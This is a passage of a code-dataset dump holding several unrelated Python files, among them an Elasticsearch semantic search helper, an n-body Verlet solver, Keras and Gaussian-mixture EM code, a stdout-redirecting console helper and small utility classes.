self.bc = BertClient(ip='localhost', output_fmt='list',timeout=1000)\n self.client = Elasticsearch('localhost:9200')\n self.client.cluster.health(wait_for_status='yellow', request_timeout=1)\n #self.count = 0\n \n def search(self,query):\n #query = input(\">>> \")\n #self.count += 1\n query_vector = self.bc.encode([query])[0]\n\n script_query = {\n \"script_score\": {\n \"query\": {\"match_all\": {}},\n \"script\": {\n \"source\": \"cosineSimilarity(params.query_vector, doc['text_vector']) + 1.0\",\n \"params\": {\"query_vector\": query_vector}\n }\n }\n }\n\n response = self.client.search(\n index = self.index_name,\n body={\n \"size\": self.search_size,\n \"query\": script_query,\n \"_source\": {\"includes\": [\"sentenceId\", \"personaId\", \"text\"]}\n }\n )\n #print(query)\n score = response['hits']['hits'][00]['_score']\n persona_block = response['hits']['hits'][00]['_source']\n persona_id =persona_block['personaId']\n script_query2 = {\n \"term\": {\n \"personaId\": str(persona_id)\n }\n }\n\n\n response2 = self.client.search(\n index = self.index_name,\n body={\n \"query\": script_query2,\n \"_source\": {\"includes\": [\"sentenceId\", \"personaId\", \"text\"]}\n }\n )\n #print(score) \n return response2['hits']['hits']#[00]['_source']['text']\n","sub_path":"searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"318173386","text":"_base_ = ['hrnet_w32_coco_512x512.py']\n\nmodel = dict(\n test_cfg=dict(\n multi_scale_score_decrease=1.0,\n nms_dist_thr=0.1,\n max_pool_kernel=9,\n ))\n\nval_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='BottomUpGetImgSize',\n base_length=32,\n test_scale_factor=[0.5, 1, 2]),\n dict(\n type='BottomUpResizeAlign',\n base_length=32,\n transforms=[\n dict(type='ToTensor'),\n dict(\n type='NormalizeTensor',\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n ]),\n dict(\n type='Collect',\n keys=['img'],\n meta_keys=[\n 'image_file', 
'aug_data', 'test_scale_factor', 'base_size',\n 'center', 'scale', 'flip_index', 'num_joints', 'skeleton',\n 'image_size', 'heatmap_size'\n ]),\n]\n\ntest_pipeline = val_pipeline\n\ndata = dict(\n val=dict(pipeline=val_pipeline),\n test=dict(pipeline=test_pipeline),\n)\n","sub_path":"PyTorch/built-in/cv/pose_estimation/HRNet_MMPose_for_PyTorch/configs/body/2d_kpt_sview_rgb_img/dekr/coco/hrnet_w32_coco_512x512_multiscale.py","file_name":"hrnet_w32_coco_512x512_multiscale.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"615410739","text":"#!/usr/bin/env python\nimport os;\nimport sys;\nscriptsDir = os.environ.get(\"UTIL_SCRIPTS_DIR\");\nif (scriptsDir is None):\n raise Exception(\"Please set environment variable UTIL_SCRIPTS_DIR\");\nsys.path.insert(0,scriptsDir);\nimport pathSetter\nimport util;\nfrom synthetic import synthetic as sn;\nimport argparse;\n\ndef do(options):\n outputFileName_core = util.addArguments(\"EmptyBackground\", [\n util.ArgumentToAdd(options.seqLength, \"seqLength\")\n ,util.ArgumentToAdd(options.numSeqs, \"numSeqs\")\n ]);\n embedInBackground = sn.EmbedInABackground(\n backgroundGenerator=sn.ZeroOrderBackgroundGenerator(seqLength=options.seqLength) \n , embedders=[]\n );\n sequenceSet = sn.GenerateSequenceNTimes(embedInBackground, options.numSeqs)\n sn.printSequences(outputFileName_core+\".simdata\", sequenceSet, includeFasta=True, includeEmbeddings=True);\n \nif __name__==\"__main__\":\n parser = argparse.ArgumentParser();\n parser.add_argument(\"--seqLength\", type=int, required=True);\n parser.add_argument(\"--numSeqs\", type=int, required=True);\n options = parser.parse_args();\n do(options); \n","sub_path":"synthetic/APIscripts/emptyBackground.py","file_name":"emptyBackground.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"286391878","text":"import numpy as np\nimport time\nfrom numba import jit\n\nclass body:\n def __init__(self,mass, pos0, vel0):\n self.mass = mass/2e30\n self.p0 = pos0\n self.v0 = vel0\n self.G = 4* np.pi**2\n \n def kinetic_energy(self,v):\n K = 0.5*self.mass*np.linalg.norm(v,axis=1)**2\n return K\n \n def potential_energy(self,r,M=1): #M = 1 for the sun\n U = -self.G*M*self.mass/np.linalg.norm(r,axis=1)\n return U\n \n def angular_momentum(self,v,r):\n angmom = np.cross(r,v*self.mass,axis=1)\n return angmom\n \n def make_pos_vec(self,N):\n self.pos_vec = np.zeros((N,3))\n self.pos_vec[0] = self.p0\n\n def make_vel_vec(self,N):\n self.vel_vec = np.zeros((N,3))\n self.vel_vec[0] = self.v0\n\n def make_acc_vec(self,N,a0):\n self.acc_vec = np.zeros((N,3))\n self.acc_vec[0] = a0\n\n \n\ndef system(*args):\n system = []\n for i in args:\n system.append(i)\n \n mass_centre = np.zeros(3)\n for i in system: #finds centreof mass\n mass_centre += i.mass*i.p0\n \n for i in system: # sets center of mass as origin\n i.p0 = i.p0-mass_centre\n \n return system\n\n \nclass solve:\n def __init__(self,system,N,dt):\n self.dt = dt\n self.N = N\n self.system = system\n\n self.G = 4*np.pi**2\n \n for i in self.system:\n i.make_pos_vec(N)\n i.make_vel_vec(N)\n for i in self.system:\n i.make_acc_vec(N,self.acceleration(i,0))\n \n \n def acceleration(self,current,i):\n acc = np.zeros(3)\n\n for j in self.system:\n if j != current:\n r = current.pos_vec[i]-j.pos_vec[i]\n acc -= r*self.G*j.mass/(np.linalg.norm(r)**3)\n return acc\n\n \n def verlet(self):\n dt = 
self.dt\n dt2 = dt**2\n \n start = time.time()\n for i in range(self.N-1):\n for j in self.system:\n j.pos_vec[i+1] = j.pos_vec[i] + dt*j.vel_vec[i] + 0.5*dt2*j.acc_vec[i]\n for j in self.system:\n j.acc_vec[i+1] = self.acceleration(j,i+1)\n for j in self.system:\n j.vel_vec[i+1] = j.vel_vec[i] + 0.5*(j.acc_vec[i]+j.acc_vec[i+1])*dt\n stop = time.time()\n print(\"Verlet : \",stop-start,\"secs\")\n \n\n\n \nif __name__ == \"__main__\":\n\ta = 2\n \n","sub_path":"project3/python/multiple_body_class.py","file_name":"multiple_body_class.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"555903216","text":"'''\r\nAuthor: Jordan Ott\r\nDescription:\r\n\tCreates network\r\n\tinput_shape: dimension of atari game window\r\n\toutput layer: number of actions available in the game\r\n\t\r\n'''\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Activation, Flatten\r\nfrom keras.layers import Convolution3D, MaxPooling3D\r\nfrom keras.optimizers import Adam\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.layers.convolutional_recurrent import ConvLSTM2D\r\n\r\ndef build_network(num_actions,input_shape):\r\n\tinput_shape = (1,input_shape[0],input_shape[1],input_shape[2])\r\n\tseq = Sequential()\r\n\tseq.add(ConvLSTM2D(nb_filter=40, nb_row=3, nb_col=3,input_shape=input_shape,\r\n\t border_mode='same', return_sequences=True))\r\n\tseq.add(BatchNormalization())\r\n\tseq.add(Dropout(.2))\r\n\t'''\r\n\tseq.add(ConvLSTM2D(nb_filter=40, nb_row=3, nb_col=3,\r\n\t border_mode='same', return_sequences=True))\r\n\tseq.add(BatchNormalization())\r\n\tseq.add(Dropout(.2))\r\n\t'''\r\n\r\n\tseq.add(Convolution3D(nb_filter=1, kernel_dim1=1, kernel_dim2=3,\r\n kernel_dim3=3, activation='sigmoid',\r\n border_mode='same', dim_ordering='tf'))\r\n\r\n\tseq.add(Activation('relu'))\r\n\r\n\tseq.add(Flatten())\r\n\t\r\n\tseq.add(Dropout(.2))\r\n\tseq.add(Dense(num_actions))\r\n\r\n\tseq.compile(loss='binary_crossentropy', optimizer='adadelta',metrics=['accuracy'])\r\n\treturn seq\r\n\r\n\t'''\r\n\tmodel = Sequential()\r\n\tmodel.add(Convolution2D(32, 8, 8, subsample=(4,4), border_mode='same',input_shape=input_shape))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Convolution2D(64, 4, 4, subsample=(2,2), border_mode='same'))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Convolution2D(64, 3, 3, subsample=(1,1), border_mode='same'))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Flatten())\r\n\tmodel.add(Dense(512))\r\n\tmodel.add(Activation('relu'))\r\n\tmodel.add(Dense(num_actions))\r\n\r\n\tadam = Adam(lr=1e-6)\r\n\tmodel.compile(loss='mse',optimizer=adam,metrics=['accuracy'])\r\n\t\r\n\treturn model\r\n'''\r\n","sub_path":"Learning Agent/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"542705875","text":"# ----------------------------------------------------------------------\n# Copyright 2018 Marco Inacio <pythonpackages@marcoinacio.com>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3 of the License.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n# ----------------------------------------------------------------------\n\nimport time\n\nimport numpy as np\nfrom scipy import stats\nfrom sstudy import do_simulation_study\nfrom univariate_htest_db_structure import ResultUVAEHTest, db\nfrom vaecompare import HTest\n\nto_sample = dict(\n distribution=[0],\n no_instances=[1000],\n dissimilarity=[\n # 0.0,\n 0.1,\n ],\n method=[\n 'vaecompare_median',\n # 'vaecompare_mean',\n 'mannwhitneyu',\n 'ks',\n 'ttest',\n ],\n nrefits=[10],\n num_layers=[5],\n)\n\n\ndef sample_filter(distribution,\n no_instances,\n dissimilarity,\n method,\n nrefits,\n num_layers):\n if method[:10] == 'vaecompare':\n return 500\n\n return True\n\n\ndef func(distribution,\n no_instances,\n dissimilarity,\n method,\n nrefits,\n num_layers):\n def data_gen(distribution, size, dissimilarity):\n probs = np.random.random(size)\n res = np.empty(size)\n if distribution == 0:\n for i in range(size):\n if probs[i] < 1 / 3:\n mu = -2. + dissimilarity\n elif probs[i] > 2 / 3:\n mu = 0. + dissimilarity\n else:\n mu = 2. + dissimilarity\n res[i] = stats.norm.rvs(mu)\n\n return res\n\n start_time = time.time()\n y_train0 = data_gen(distribution, no_instances, 0)\n y_train1 = data_gen(distribution, no_instances, dissimilarity)\n\n if method == 'mannwhitneyu':\n htest = stats.mannwhitneyu(y_train0, y_train1,\n alternative='two-sided')\n\n if method == 'ks':\n htest = stats.ks_2samp(y_train0, y_train1)\n\n if method == 'ttest':\n htest = stats.ttest_ind(y_train0, y_train1,\n equal_var=False)\n\n if method[:10] == 'vaecompare':\n averaging = method[11:]\n\n htest = HTest(dataloader_workers=0, verbose=1,\n averaging=averaging,\n num_layers_decoder=num_layers,\n num_layers_encoder=num_layers,\n )\n htest.fit(y_train0, y_train1, 10000,\n nrefits=nrefits,\n )\n\n elapsed_time = time.time() - start_time\n\n return dict(\n pvalue=htest.pvalue,\n elapsed_time=elapsed_time,\n )\n\n\ndo_simulation_study(to_sample, func, db, ResultUVAEHTest,\n max_count=10000, sample_filter=sample_filter)\n","sub_path":"vaecompare-master/univariate_htest_sstudy_do.py","file_name":"univariate_htest_sstudy_do.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514255433","text":"#########################################################################\n#\n# Copyright 2013 Cloud Sidekick\n# __________________\n#\n# All Rights Reserved.\n#\n# NOTICE: All information contained herein is, and remains\n# the property of Cloud Sidekick and its suppliers,\n# if any. The intellectual and technical concepts contained\n# herein are proprietary to Cloud Sidekick\n# and its suppliers and may be covered by U.S. 
and Foreign Patents,\n# patents in process, and are protected by trade secret or copyright law.\n# Dissemination of this information or reproduction of this material\n# is strictly forbidden unless prior written permission is obtained\n# from Cloud Sidekick.\n#\n#########################################################################\n\nimport catoclient.catocommand\nfrom catoclient.param import Param\n\n\nclass ImportPipeline(catoclient.catocommand.CatoCommand):\n\n Description = \"\"\"Imports a Pipeline definition from a JSON document.\n\nReturns a Pipeline Object.\"\"\"\n\n API = 'import_pipeline'\n Examples = ''''''\n Options = [Param(name='backupfile', short_name='b', long_name='backupfile',\n optional=False, ptype='string',\n doc='A JSON document formatted as a complete CSK Pipeline backup.'),\n Param(name='overwrite', short_name='o', long_name='overwrite',\n optional=True, ptype='string',\n doc=\"\"\"Valid values: pipeline|phases|all|none (default).\"\"\")\n ]\n\n def main(self):\n import os\n\n self.backup = None\n if self.backupfile:\n fn = os.path.expanduser(self.backupfile)\n with open(fn, 'r') as f_in:\n if not f_in:\n print(\"Unable to open file [%s].\" % fn)\n self.backup = f_in.read()\n\n results = self.call_api(self.API, ['backup', 'overwrite'])\n print(results)\n","sub_path":"maestroclient/commands/importpipeline.py","file_name":"importpipeline.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"327231870","text":"# Create your classes here\n\nclass Student(object):\n\n def __init__(self, first_name, last_name, address):\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n\n\nclass Question(object):\n\n def __init__(self, question, answer):\n self.question = question\n self.answer = answer\n\n def ask_and_evaluate(self):\n print(self.question) \n answer = input(\"Answer: \") \n\n return answer == self.answer\n\n\nclass Evaluation(object):\n\n def __init__(self, name):\n self.name = name\n self.questions = []\n\n def add_question(self, question):\n self.questions.append(question) \n\n\nclass Exam(Evaluation):\n\n def administer(self):\n counter = 0\n score = 0\n\n for question in self.questions:\n is_correct = question.ask_and_evaluate()\n counter += 1\n if is_correct:\n score += 1\n\n print(\"Your score is {}\".format(100 * score / counter))\n return (100 * score / counter) \n # print(\"Your score is {}\".format(100 * score / len(self.questions)))\n\n\nclass Quiz(Evaluation):\n\n def administer(self):\n counter = 0\n score = 0\n\n for question in self.questions:\n is_correct = question.ask_and_evaluate()\n counter += 1\n if is_correct:\n score += 1\n\n if score / counter >= 0.5:\n print(\"You passed the quiz!\")\n return 1\n print(\"Sorry - you failed the quiz\")\n return 0\n\n\nclass StudentExam:\n score = float()\n\n def __init__(self, student, exam):\n self.student = student\n self.exam = exam\n\n\n def take_test(self):\n self.score = self.exam.administer()\n\n\ndef example():\n midterm = Quiz(\"midterm\")\n question1 = Question(\"What color is the sky?\", \"Blue\")\n question2 = Question(\"Whats your favorite coding language?\", \"Python\")\n midterm.add_question(question1)\n midterm.add_question(question2)\n jane = Student(\"Jane\", \"Pain\", \"123 street\")\n jane_exam = StudentExam(jane, midterm)\n 
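# (added) administer the quiz interactively on stdin and record the score\n    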
jane_exam.take_test()\n\n","sub_path":"oo.py","file_name":"oo.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"589477393","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass KmeansCluster:\n \"\"\"\n Attribute:\n K: the number of cluster\n centroids: the centroid of each cluster, will be an array of K*X.shape[1]\n clusters: the cluster label for each datapoints\n Method:\n initialize_cluster_centroids: randomly pick K datapoints as cluster centroid\n cluster_assign: assign each datapoint to the nearest centroid\n calculate_centroids: recompute each cluster centroids due to its cluster label\n check_converge:check if the algorithm has converge\n \"\"\"\n def __initialize_cluster_centroids(self,X):\n #We set cluster centroids as an array of K*X.shape[1]\n shuffled_pos=np.random.permutation(X.shape[0])\n pos=shuffled_pos[:self.K]\n self.centroids=X[pos,:]\n def cluster_assign(self,X):\n distance_to_centroids=np.zeros((X.shape[0],self.centroids.shape[0]))\n #distance_to_centroids will stored the distance from each datapoint to each centroid\n #the position (i,j) will stored the distance from datapoint i to centroid j\n for i in range(self.centroids.shape[0]):\n centroid=self.centroids[i] #the current centroids\n X_distance=(X-centroid)**2 #substract and square\n X_distance=np.sum(X_distance,axis=1) #calculate the square distance to the centroid\n distance_to_centroids[:,i]=X_distance #assign it to column i\n return np.argmin(distance_to_centroids,axis=1)\n def __calculate_centroids(self,X):\n self.centroids=np.zeros((self.K,X.shape[1]))\n for i in range(self.K):\n self.centroids[i]=np.mean(X[self.clusters==i],axis=0)\n def __check_converge(self,last_centroids):\n #Check if the algorithm has converged\n distance=np.sum((self.centroids-last_centroids)**2)\n if(distance<1e-6):return True\n else: return False\n def __costFunction(self,X):\n X_recover=np.zeros((X.shape[0],X.shape[1]))\n for i in range(self.K):\n X_recover[self.clusters==i]=self.centroids[i]\n costEachpoint=np.sqrt(np.sum((X-X_recover)**2,axis=1)) #distance of each point to its centroids\n cost=np.sum(costEachpoint)/X.shape[0]\n return cost\n def Segmentation(self,X,K,max_iteration=2000,print_loss=True):\n self.clusters=None\n self.K=K\n self.centroids=None\n self.__initialize_cluster_centroids(X)\n for i in range(max_iteration):\n last_centroids=self.centroids\n self.clusters=self.cluster_assign(X)\n self.__calculate_centroids(X)\n if(print_loss):print('Loss at iteration '+str(i)+': '+str(self.__costFunction(X)))\n if(self.__check_converge(last_centroids)):break\n\ndef initialize(X,n_clusters,n_dimensions):\n '''\n initialize the lambd, mu and sigma for mixture of gaussian.\n Parameters:\n X:data\n n_cluster: number of clusters\n n_dimensions: number of dimensions\n '''\n kmeans=KmeansCluster()\n kmeans.Segmentation(X,n_clusters)\n lambd=np.ones((n_clusters,))/n_clusters\n mu=kmeans.centroids\n print('Cluster centroid after applying kmeans: '+str(mu))\n sigma=np.array([np.eye(n_dimensions) for i in range(n_clusters)])\n return lambd,mu,sigma\n\ndef gaussian_function(X,mu,sigma):\n '''\n Calculate the gaussian distribution, given data x, mean mu and covariance sigma.\n X: 2D array, in the shape of (n_samples,n_dimensions)\n mu: 1D array, represents the mean, in the shape of (n_dimensions,)\n sigma: 2D array, represents the covariance, in the shape of (n_dimensions,n_dimensions)\n '''\n 
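# (added) evaluates N(x; mu, sigma) = |2*pi*sigma|^(-1/2) * exp(-0.5*(x-mu)^T inv(sigma) (x-mu))\n    # for every row of X at once\n    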
mu=mu.reshape((1,mu.shape[0]))\n det=np.linalg.det(2*np.pi*sigma) #determinant\n det=det**(-0.5)\n inv_sigma=np.linalg.inv(sigma) #inverse matrix of sigma\n exp=np.exp((-0.5*np.dot((X-mu),inv_sigma.dot((X-mu).T))))\n return det*np.array([exp[i,i] for i in range(X.shape[0])])\n\ndef e_step(X,lambd,mu,sigma):\n '''\n E step in EM algorithm\n X: data X\n lambd: lambd parameters, 1D numpy array\n mu: mu parameters, 2D numpy array\n sigma: sigma parameters, 3D numpy array \n '''\n r=np.zeros((X.shape[0],lambd.shape[0]))\n for i in range(lambd.shape[0]):\n r[:,i]=gaussian_function(X,mu[i],sigma[i])\n lambd=lambd.reshape((1,lambd.shape[0]))\n r=r*lambd\n return r/np.reshape(np.sum(r,axis=1),(X.shape[0],1))\n\ndef m_step(X,r):\n '''\n Update parameters via m_step.\n Parameters:\n X: data, in shape of (n_samples,n_dimensions)\n '''\n lambd=np.zeros((r.shape[1],))\n mu=np.zeros((r.shape[1],X.shape[1]))\n sigma=np.zeros((r.shape[1],X.shape[1],X.shape[1]))\n for k in range(r.shape[1]):\n lambd[k]=np.sum(r[:,k])/r.sum()\n mu[k]=np.sum(r[:,k].reshape((X.shape[0],1))*X,axis=0)/np.sum(r[:,k])\n new_mu=mu[k].reshape((1,X.shape[1]))\n sigma[k]=(X-new_mu).T.dot(r[:,k].reshape(X.shape[0],1)*(X-new_mu))/np.sum(r[:,k])\n return lambd,mu,sigma\n\ndef update(n_iterations,X,n_clusters=3):\n '''\n Update the parameters for EM algorithm\n Parameters:\n n_iterations: number of maximum iterations\n X: data X\n '''\n log_likelihood=[]\n lambd,mu,sigma=initialize(X,n_clusters,X.shape[1])\n last_lambd=lambd\n last_mu=mu\n last_sigma=sigma\n for i in range(n_iterations):\n print('Iteration {}'.format(i))\n r=e_step(X,lambd,mu,sigma)\n lambd,mu,sigma=m_step(X,r)\n diff=np.sum(lambd-last_lambd)+np.sum(last_mu-mu)+np.sum(last_sigma-sigma)\n print(diff)\n densities=prob_densities(X,last_lambd,last_mu,last_sigma)\n log_likelihood.append(np.sum(np.log(densities)))\n last_lambd=lambd;last_mu=mu;last_sigma=sigma\n if(np.abs(diff)<1e-8):break\n print('Number of iteration {}'.format(i))\n return lambd,mu,sigma,log_likelihood\n\n'''lambd,mu,sigma=update(1000,X)\nprint('After applying EM: '+str(lambd))\nprint('After applying EM: '+str(mu))\nprint(sigma)'''\n\ndef cluster_assigned(X,lambd,mu,sigma):\n '''\n Assigned the cluster label to each data point of X\n '''\n cluster_id=np.argmax(e_step(X,lambd,mu,sigma),axis=1)\n return cluster_id\n\n'''cluster_id=cluster_assigned(X,lambd,mu,sigma)\nplt.plot(X[cluster_id==0,0],X[cluster_id==0,1],'ro')\nplt.plot(X[cluster_id==1,0],X[cluster_id==1,1],'b^')\nplt.plot(X[cluster_id==2,0],X[cluster_id==2,1],'gs')\nplt.show()'''\n\ndef make_data(minx,maxx,miny,maxy,n=100):\n '''\n Make the data for contour plot.\n Parameters:\n minx,maxx,miny,maxy: the minimum and maximum value in the x and y axis\n n: number of datapoint along each axis\n '''\n x0=np.linspace(minx,maxx,n)\n x1=np.linspace(miny,maxy,n)\n xx0,xx1=np.meshgrid(x0,x1)\n x0_ravel=np.ravel(xx0)\n x1_ravel=np.ravel(xx1)\n X_data=np.array([x0_ravel,x1_ravel]).T\n return xx0,xx1,X_data\n\ndef prob_densities(X,lambd,mu,sigma):\n '''\n Calculate the prob density for each data point\n Paramters:\n X: list of data point\n mu: mean\n sigma: covariance\n '''\n r=np.zeros((X.shape[0],mu.shape[0]))\n for i in range(r.shape[1]):\n r[:,i]=gaussian_function(X,mu[i],sigma[i])\n lambd=lambd.reshape(1,lambd.shape[0])\n return 
np.sum(lambd*r,axis=1)\n'''r1=x1\nr2=x2\nr3=x3\nx0=np.linspace(0,4,100)\nx1=np.linspace(0,4,100)\nxx0,xx1=np.meshgrid(x0,x1)\nx0_ravel=np.ravel(xx0)\nx1_ravel=np.ravel(xx1)\nX_data=np.array([x0_ravel,x1_ravel]).T\ndensities=prob_densities(X_data,lambd,mu,sigma)\ndensities=densities.reshape(xx0.shape)\nplt.contour(xx0,xx1,densities)\nplt.plot(r1[:,0],r1[:,1],'ro')\n\nx0=np.linspace(6,10,100)\nx1=np.linspace(1,5,100)\nxx0,xx1=np.meshgrid(x0,x1)\nx0_ravel=np.ravel(xx0)\nx1_ravel=np.ravel(xx1)\nX_data=np.array([x0_ravel,x1_ravel]).T\ndensities=prob_densities(X_data,lambd,mu,sigma)\ndensities=densities.reshape(xx0.shape)\nplt.contour(xx0,xx1,densities)\nplt.plot(r2[:,0],r2[:,1],'b^')\n\nx0=np.linspace(1,5,100)\nx1=np.linspace(4,8,100)\nxx0,xx1=np.meshgrid(x0,x1)\nx0_ravel=np.ravel(xx0)\nx1_ravel=np.ravel(xx1)\nX_data=np.array([x0_ravel,x1_ravel]).T\ndensities=prob_densities(X_data,lambd,mu,sigma)\ndensities=densities.reshape(xx0.shape)\nplt.contour(xx0,xx1,densities)\nplt.plot(r3[:,0],r3[:,1],'go')\nplt.xlim(0,10)\nplt.ylim(0,10)\nplt.show()'''\n","sub_path":"EM/em.py","file_name":"em.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"291981973","text":"import pytest\n\nfrom ..average_and_percentage import average\n\n\n@pytest.mark.parametrize('a, b, c, d, expected', [\n (10, 10, 10, 10, 10),\n (20, 20, 20, 20, 20),\n (100, 100, 100, 100, 100)\n])\ndef test_average(a, b, c, d, expected):\n actual = average(a, b, c, d)\n assert actual == expected\n","sub_path":"arithmetic_03/test/test_average_and_percentage.py","file_name":"test_average_and_percentage.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"53788556","text":"import threading\nimport os\nimport sys\nimport zencad\nimport signal\nimport psutil\nimport zencad.gui.signal_os\n\nfrom zencad.util import print_to_stderr\nfrom threading import Timer\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n__RETRANSLER_TRACE__ = False\n\ndef run_with_timeout(timeout, default, f, *args, **kwargs):\n\tif not timeout:\n\t\treturn f(*args, **kwargs)\n\ttry:\n\t\ttimeout_timer = Timer(timeout, threading.interrupt_main)\n\t\ttimeout_timer.start()\n\t\tresult = f(*args, **kwargs)\n\t\treturn result\n\texcept KeyboardInterrupt:\n\t\treturn default\n\tfinally:\n\t\ttimeout_timer.cancel()\n\nclass console_retransler(QThread):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.name = \"console_retransler\"\n\t\tself.do_retrans()\n\t\tself.stop_token = False\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.pid = os.getpid()\n\t\t\tself.readFile = os.fdopen(self.r)\n\t\texcept Exception as ex:\n\t\t\tsys.stderr.write(\"console_retransler::rdopen error: \", ex, self.ipipe)\n\t\t\tsys.stderr.write(\"\\r\\n\")\n\t\t\tsys.stderr.flush()\n\t\t\texit(0)\n\t\t\n\t\twhile(True):\n\t\t\tif self.stop_token:\n\t\t\t\tif __RETRANSLER_TRACE__:\n\t\t\t\t\tprint_to_stderr(\"finish console retransler... ok\")\n\t\t\t\treturn\n\t\t\ttry:\n\t\t\t\tinputdata = self.readFile.readline()\n\t\t\texcept:\n\t\t\t\tif __RETRANSLER_TRACE__:\n\t\t\t\t\tprint_to_stderr(\"finish console retransler... except\")\n\t\t\t\treturn\n\t\t\t\n\t\t\tzencad.gui.application.MAIN_COMMUNICATOR.send({\"cmd\":\"console\",\"data\":inputdata})\n\n\tdef finish(self):\n\t\tif __RETRANSLER_TRACE__:\n\t\t\tprint_to_stderr(\"finish console retransler... 
started\")\n\t\t\t\n\t\t#os.kill(self.pid, signal.SIGKILL)\n\t\tself.stop_token = True\n\n\n\t\t# TODO: CHANGE FINISH MODEL\n\n\t\t#try:\n\t\t#\tos.close(self.readFile.fileno())\n\t\t#except:\n\t\t#\tpass\n#\n\t\t#if __RETRANSLER_TRACE__:\n\t\t#\tprint_to_stderr(\"L\")\n\t\t#try:\n\t\t#\t#\tprint_to_stderr(\"B\")\n\t\t#\t#time.sleep(0.05)\n\t\t#\tzencad.gui.signal_os.kill(self.pid, zencad.gui.signal_os.sigkill)\n\t\t#except Exception as ex:\n\t\t#\tprint_to_stderr(\"console_retransler on kill\", ex)\n#\n\t\t#if __RETRANSLER_TRACE__:\n\t\t#\tprint_to_stderr(\"finish console retransler... exit\")\n\n\n\t\t#gone, alive = psutil.wait_procs(procs, timeout=3, callback=on_terminate)\n\t\t#for p in alive:\n\t\t# p.kill()\n\n\tdef do_retrans(self, old=1, new=3):\n\t\tif __RETRANSLER_TRACE__:\n\t\t\tprint_to_stderr(\"do_retrans old:{} new:{}\".format(old, new))\n\n\t\tos.dup2(old, new)\n\t\tr, w = os.pipe()\n\t\tself.r = r\n\t\tself.w = w\n\t\tself.old = old\n\t\tself.new = new\n\t\tos.close(old)\n\t\tos.dup2(w, old)\n\n\t\tsys.stdout = os.fdopen(old, \"w\", 1)\n","sub_path":"zencad/gui/retransler.py","file_name":"retransler.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"65677743","text":"from .core import Primitive\n\nclass Flag(Primitive):\n\n def __init__(self, value=False):\n Primitive.__init__(self)\n self._Value = value\n\n def set(self, value=True):\n self._Value = value\n self.wakeup()\n\n def get(self):\n return self._Value\n\n value = property(get, set)\n\n def sleep_until(self, value=None, predicate=None, timeout = None):\n if value is not None:\n predicate = lambda x, v=value: x == v\n if predicate is None:\n predicate = lambda x: bool(x) # default: wait until the value evaluates to True\n while True:\n with self:\n if predicate(self._Value):\n break\n else:\n self.sleep(timeout)\n","sub_path":"pythreader/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"125858632","text":"#!/usr/bin/env python\n#\n# Copyright 2013 Simone Campagna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n__author__ = 'Simone Campagna'\n\nimport inspect\n\nfrom .field import *\n\nclass FieldType(object):\n def __init__(self, field_name, field_type, description=\"\", default=None):\n self.field_name = field_name\n assert issubclass(field_type, Field), \"invalid field type {}\".format(type(field_type))\n self.field_type = field_type\n self.attr_name = self.field_type.create_attr_name(self.field_name)\n if description is None:\n description = \"\"\n self.field_description = description\n self.field_default = default\n self.frame, self.filename, self.line_number, self.function_name, self.lines, self.index=\\\n inspect.getouterframes(inspect.currentframe())[1]\n\n def create(self):\n if self.field_default is None:\n instance = self.field_type()\n else:\n instance = 
